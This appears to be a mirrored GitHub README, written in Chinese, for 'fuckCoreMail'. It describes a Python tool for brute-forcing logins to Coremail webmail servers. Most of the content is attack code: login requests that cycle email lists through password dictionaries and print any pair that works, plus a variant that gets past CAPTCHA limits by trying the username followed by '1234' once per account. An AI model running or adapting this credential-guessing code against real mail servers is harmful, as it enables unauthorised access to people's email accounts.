Git Product home page Git Product logo

fuckcoremail's Introduction

fuckCoreMail爆破说明书

email.txt为用户的邮箱 password.txt 为用户密码字典

self.data = {'local':'zh_CN', 'uid': self.email, 'nodetect':'false', 'password': self.password,'action:login': ''}
            self.url = 'https://' + self.mailDomain + '/coremail/index.jsp?cus=1'
            self.req = self.session.post(self.url,self.data, verify=False)
            if r'cexpand' in self.req.text:
                print self.data
            time.sleep(3)

如果爆破成功打印self.data 当coremail没有验证码限制的时候,可以用fuckCoreMail.py做为爆破 可以循环爆破

    with open('email.txt', 'r') as f:
        with open('password.txt', 'r') as p:
            for emailUser in f.readlines():
                for emailPass in p.readlines():
                    fuckMail = ClmbFuckCoreMail('mail.xxx.com.cn', emailUser.strip(), emailPass.strip())
                    fuckMail.run()
                p.seek(0)

当coremail有验证码限制的时候,可以用fuckCoreMailVerify.py做为爆破 采用一人密码只尝试一次

    with open('email.txt', 'r') as f:
            for emailUser in f.readlines():
                    fuckMail = ClmbFuckCoreMail('mail.xxx.com.cn', emailUser.strip(), emailUser.strip() + '1234') //1234加在用户名后面为组合字典
                    fuckMail.run()

fuckcoremail's People

Contributors

pyphrb avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.